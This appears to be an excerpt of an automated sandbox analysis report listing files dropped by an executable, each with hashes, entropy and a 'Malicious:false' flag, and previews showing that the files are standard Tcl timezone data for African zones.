                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Bujumbura) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3852
                                                                                                                                                                                                                              Entropy (8bit):3.7766651198444507
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:58ybRwEa40MF4pt0/jaGYbaJF0a3T07ITB85oWXmSGmuyTVuV0apRQnL0KD3rZza:fLg1GbJFp3gHRQVy7DPUUQkiHMo
                                                                                                                                                                                                                              MD5:9DCDB3DD41DA13D81EB8E1CAF56964DA
                                                                                                                                                                                                                              SHA1:F95EE7B1EF464F2640EC4AE29F3C18B5BF2B2905
                                                                                                                                                                                                                              SHA-256:8698B0A53D858AEA7C495EDF759EF0E6C63F7E07A256599393DEC7B7A7413734
                                                                                                                                                                                                                              SHA-512:BA5898ABEE541BC72C9DEDD77BABB18024C7AEA0274FA3F809748FCBFF770BFAD902BF70680DDE989F7D3592E5398C100D0E0EA388D4200911ED7DE089535D6D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Cairo) {.. {-9223372036854775808 7509 0 LMT}.. {-2185409109 7200 0 EET}.. {-929844000 10800 1 EEST}.. {-923108400 7200 0 EET}.. {-906170400 10800 1 EEST}.. {-892868400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-857790000 7200 0 EET}.. {-844308000 10800 1 EEST}.. {-825822000 7200 0 EET}.. {-812685600 10800 1 EEST}.. {-794199600 7200 0 EET}.. {-779853600 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165801600 7200 0 EET}.. {-147402000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5532
                                                                                                                                                                                                                              Entropy (8bit):3.535398586134154
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:zE+CJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:7MZSszBrlKcJC9k
                                                                                                                                                                                                                              MD5:18183122D242E0B69A80BC02BC0328DF
                                                                                                                                                                                                                              SHA1:C9976ABC0663EB29A2FEAAFDF6746C05A264B67C
                                                                                                                                                                                                                              SHA-256:8776EEDFDFEE09C4C833593127CEFAC9C33E2487AB9BF4BF8C73E5E11B4E5613
                                                                                                                                                                                                                              SHA-512:9611A6EF9C5B55FAB752C1EC7E464B8AF60AE32383CE9BA72F35168ABB68A45DB0654A9099CBDC123F5F6E2B6DB7C8FBF56A8DDB813824187AD1090971F12219
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Casablanca) {.. {-9223372036854775808 -1820 0 LMT}.. {-1773012580 0 0 +00}.. {-956361600 3600 1 +00}.. {-950490000 0 0 +00}.. {-942019200 3600 1 +00}.. {-761187600 0 0 +00}.. {-617241600 3600 1 +00}.. {-605149200 0 0 +00}.. {-81432000 3600 1 +00}.. {-71110800 0 0 +00}.. {141264000 3600 1 +00}.. {147222000 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {448243200 3600 0 +01}.. {504918000 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {13731
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7536
                                                                                                                                                                                                                              Entropy (8bit):3.8315604186920704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:TzLdXKy9f4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:TdayR41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:30155093248C4F7E45EF7C0132D2B2AB
                                                                                                                                                                                                                              SHA1:FAD100CC49F0CB0910BDE39B43295A47512E1BE6
                                                                                                                                                                                                                              SHA-256:8827F7311EDE69A9679BDF2B7418DBF350A2FC8F973E8B1E1E4390D4D5C6D2E8
                                                                                                                                                                                                                              SHA-512:469A24AF0C2A4A40CB2488C3E21BB9BBDE057F876EACA08A31FC6F22845063D917A0A4AE96680401E45792DE534EE3A305F137A93C4DF879B4602510D881270E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ceuta) {.. {-9223372036854775808 -1276 0 LMT}.. {-2177452800 0 0 WET}.. {-1630112400 3600 1 WEST}.. {-1616810400 0 0 WET}.. {-1451692800 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1293840000 0 0 WET}.. {-94694400 0 0 WET}.. {-81432000 3600 1 WEST}.. {-71110800 0 0 WET}.. {141264000 3600 1 WEST}.. {147222000 0 0 WET}.. {199756800 3600 1 WEST}.. {207702000 0 0 WET}.. {231292800 3600 1 WEST}.. {244249200 0 0 WET}.. {265507200 3600 1 WEST}.. {271033200 0 0 WET}.. {448243200 3600 0 CET}.. {504918000 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.88110192592456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcmMM1+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DCM1+c
                                                                                                                                                                                                                              MD5:8CDD2EEB7E0EC816F3EC051350FEBF13
                                                                                                                                                                                                                              SHA1:37F3A149B4A01DFA2EAB42A28C810BE66AAB7C52
                                                                                                                                                                                                                              SHA-256:3176C99FC45337CBCE0CD516DE4B02B8BAA47D00E84F698122A2ADD57797984E
                                                                                                                                                                                                                              SHA-512:5A90B6DB45EDAD7734D596FB81FD1959A433F57E71D2212E1DCBD6A12F3FD1FE747FA363C4C787A4D3023F542553C1E2C9CF4F61E28F1BB13042E4AFE3D0FF31
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Conakry) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.856992353568779
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXXMFBx/2DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DKXEBn
                                                                                                                                                                                                                              MD5:946D3B52F915445DBB8EE8BF67F4EFAB
                                                                                                                                                                                                                              SHA1:18345968B95E886CA72634D49F2B38F9B29BA629
                                                                                                                                                                                                                              SHA-256:D50F9732757B284BAC75526F2CFA585DF7F6974160827AFB0FF66124C7CFD361
                                                                                                                                                                                                                              SHA-512:00B531D1352CF35045EE25C777C7FEA17294E9861E68CE2DE0D9884C05EBDEA84D5F4F0E8B5605721295E25C259979446B7DB76525A633C7D2FA35B38962CF43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Dakar) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.8447607449193075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2Dc8bEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DJbVDR
                                                                                                                                                                                                                              MD5:7A819572758BC60F4085DF28F1DD1C01
                                                                                                                                                                                                                              SHA1:0A5BA34EBFBA5A8E8B896713BA527781FC90FF01
                                                                                                                                                                                                                              SHA-256:AB69948637416219A3D458777990FA4568BEBC89388884BBF129C0E1370A560B
                                                                                                                                                                                                                              SHA-512:C03E785D1E85292056BB0BDD8DF8326C5DFEB6070AB1C071E1032D14EA69C9DEBC57B2CC7852E35D31652187126CCF0009A6A5C32F9DBB75D56C705535DF05CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Dar_es_Salaam) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.829357904445218
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcRHKQ1BQDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DOrkDR
                                                                                                                                                                                                                              MD5:7981499F9430DC1636C9F834273E0B91
                                                                                                                                                                                                                              SHA1:1D63F8578420D56E4A5D9D0881FBEC015421E416
                                                                                                                                                                                                                              SHA-256:E7F7560CCD65D53C446ADAE7128A74D37E17DD0B907A2F2FD85322FB8707B497
                                                                                                                                                                                                                              SHA-512:3C3F7D78E9A0DE6E2950E1C305EA2DBC986754AE9FB10AC410685F30C39EC235F6F221393099C012E62EE5A7B4F1BED67C96B7B81E90BBA064BA9FE685FE4050
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Djibouti) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.850101792457859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcnKe2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dml2D4yn
                                                                                                                                                                                                                              MD5:44881E75AC32FA95FF6143066EF01B90
                                                                                                                                                                                                                              SHA1:A221619B4CDE8BE6A181E1F3869EAB665F2E98B8
                                                                                                                                                                                                                              SHA-256:FCF2DAD148F4D2951320EA99730C56D5EB43D505F37416BE4BAD265CE2902706
                                                                                                                                                                                                                              SHA-512:4FA67A5F84758366189F0FC4A7FA6C820BA083E1C56EA95D25D21A367F25F76261B7EB5631DFFEB20E095CFD64E770338773F76BD50D4CF6AE29AD3EDFCEC408
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Douala) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5235
                                                                                                                                                                                                                              Entropy (8bit):3.541189246992611
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+eCJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:+eqZSszBrlKcJC9k
                                                                                                                                                                                                                              MD5:956F5B51FA8BA2E954A0E59AAC8F3276
                                                                                                                                                                                                                              SHA1:AE35A8502E57EA6EE173E3B42509E4CAC73DA091
                                                                                                                                                                                                                              SHA-256:5FB102A95B3C004AAB8371840B1A04AC352F48FF9E9EAFDEAAF21960B0F3CAA6
                                                                                                                                                                                                                              SHA-512:19E7F2574E2B62DF68CC24737F6B94864B3D64B2472BC7D78E6AB5142A1DC1AB3B3700AB802129CB16AED4A4FED29E2B8A5593EE327ADF496255FE2FEF6A7023
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/El_Aaiun) {.. {-9223372036854775808 -3168 0 LMT}.. {-1136070432 -3600 0 -01}.. {198291600 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {1373162400 0 0 +00}.. {1376100000 3600 1 +00}.. {1382839200 0 0 +00}.. {1396144800 3600 1 +00}.. {1403920800 0 0 +00}.. {1406944800 3600 1 +00}.. {1414288800 0 0 +00}.. {1427594400 3600 1 +00}.. {1434247200 0 0 +00}.. {1437271200 3600 1 +00}.. {1445738400 0 0 +00}.. {1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.866631090752554
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcu5sp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dk4DBS
                                                                                                                                                                                                                              MD5:6C115220CF951FC2EE3C299F86935B6D
                                                                                                                                                                                                                              SHA1:A1CAB8C710BF20553AF45343118C1726CFE922B7
                                                                                                                                                                                                                              SHA-256:BC53A4D489F48F14C594C4B0E52079B34E043A5751BBC7DF254A560352243575
                                                                                                                                                                                                                              SHA-512:E87A4FD145B645DF034182CAD7F9D2BE5B2D9F3A17B6A9B6C84A0B3E846D92EC4C69DF2E85129B7A1AFBC0CCAAC8E3B1D47EB09F0900A82B908E9F6BF63B9736
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Freetown) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.899477454245453
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcHK0o/4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAV+4Dt
                                                                                                                                                                                                                              MD5:07222D8ED83CDC456B4D5D84C4BDE320
                                                                                                                                                                                                                              SHA1:2C657F461FA3F48D56C791AFE4AB7D2EAF45AF60
                                                                                                                                                                                                                              SHA-256:653AF88955C4418D973E2F8681A99552EB7BE95BCA64C736072F488462F7B373
                                                                                                                                                                                                                              SHA-512:3016D0636F401BD88BCD460F6A61782E7E8A2C32CE4ECB904C711DF414038A5818F0CA3D7FC671C5ABCE70647FC674A2EF9081C5289EBFD184B44885902E007A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Gaborone) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.884642061266759
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc0B5h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2Dlfh4Dt
                                                                                                                                                                                                                              MD5:8666DABE8D196ACD94A9691C592FAF4E
                                                                                                                                                                                                                              SHA1:9F7EE009DCEAACA79C6EAA6FC73015D595467919
                                                                                                                                                                                                                              SHA-256:06B82C524585192E0E8FC69DCC1CF86183A8C5EF404645DC413FCF3F8C16B0AB
                                                                                                                                                                                                                              SHA-512:AAA32FD1B01BFECDD0D1C9C1DF1163374DAFE094C75720EA4095C34F7EAE7DCB594D1A7F6A2A90FB43FF01020F7AEB48E92496E0EE2D039AF23076CD369DD2A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Harare) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):309
                                                                                                                                                                                                                              Entropy (8bit):4.695542624694403
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DWbzDm2OHePoHvmmXsd//HF2d7d6VcF2d6KsYov:MB862DW7mdHePCvmmcZvF0cVcF/KsFv
                                                                                                                                                                                                                              MD5:F0E153FC9B978E30742ABC025CA45E02
                                                                                                                                                                                                                              SHA1:73D96F3188190DAC2453E6F18A1C683CECB9CDE3
                                                                                                                                                                                                                              SHA-256:5EEF6475E1312051037FCAE3354E32DC0910BE7A5116B71F8CCBE1CCA08D3F1C
                                                                                                                                                                                                                              SHA-512:E66F4B5FF18BAAD53AFB1ED36A0827115C793075A61F794F26F32BC9F6799DF816A1F817BEB0C0BC938F89E6F5BFBE1AB4F504F1AF518764103FB287746552C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Johannesburg) {.. {-9223372036854775808 6720 0 LMT}.. {-2458173120 5400 0 SAST}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {-829526400 10800 1 SAST}.. {-813805200 7200 0 SAST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1127
                                                                                                                                                                                                                              Entropy (8bit):4.027824722230131
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5mesdOkMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8M5:5YMV04MSHMzNxMbwM0JXMfCsMzaMq0QJ
                                                                                                                                                                                                                              MD5:32EC0589260D9D4BCC85FE91E6F04D00
                                                                                                                                                                                                                              SHA1:BAA269852C4AC6B89EA7941E7A75A007E0CF9EDF
                                                                                                                                                                                                                              SHA-256:F2646E15488ABF2E960759CEFE5705416E71DA71BB8407B26196244FD1A3394F
                                                                                                                                                                                                                              SHA-512:4F485453BE1D186ADBE0908852475C63C57BA498091C222EFFB9A5FEA2DB7F55E1BB2DBDBF6AC0F24CC67D47549FA3F5257655B5449B1BCF1FB5CDB27B03D501
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Juba) {.. {-9223372036854775808 7588 0 LMT}.. {-1230775588 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.837466713772859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcJEl2DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DIEl2V
                                                                                                                                                                                                                              MD5:E929ED1BC316C71AABE7E625BD562FB1
                                                                                                                                                                                                                              SHA1:C20C172518C02D93327F4BBBC5D410BFFEF5039D
                                                                                                                                                                                                                              SHA-256:8EA3028CE2B025F0C457DC8F7601279CA5AF565A88B9FE80208F9F1030F2B0D0
                                                                                                                                                                                                                              SHA-512:B2FBCF06EACCF18DE97AF1D6BC57D9638E0A36DBF17044FF97F6B9E5089CF9E13E1304F304495324C0ACC1128A7D2D494E7C1FDB95DB0855FCE54F7028096C50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1131
                                                                                                                                                                                                                              Entropy (8bit):4.0421745451318385
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5xe9dSXMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8MM:5hMV04MSHMzNxMbwM0JXMfCsMzaMq0Qc
                                                                                                                                                                                                                              MD5:2BD3850DDBE2F05BF6F24F3AEFF7516C
                                                                                                                                                                                                                              SHA1:22B0DBB54E071F30D51A8654CF103F99537F74CD
                                                                                                                                                                                                                              SHA-256:F475DB8A857A46B310B12C21D6A9BC6CA9FF2960DA429A9D57FA375F9439E13B
                                                                                                                                                                                                                              SHA-512:1CF82FC07348C697F26625673DA7E3D734358B3FBE69D8E2132CAC0D9F00C7E8CDC353676CD9BAC4CBB9E26CF6638CEAE41DF559E7445D9C453409D7115FFC6C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Khartoum) {.. {-9223372036854775808 7808 0 LMT}.. {-1230775808 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.910322325134086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcCJRx+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DRX+DEi
                                                                                                                                                                                                                              MD5:3017253E1C6ACCA8D470A014E4BB321D
                                                                                                                                                                                                                              SHA1:671B7AC04580B56E2C34F88D123E8296947DDD7E
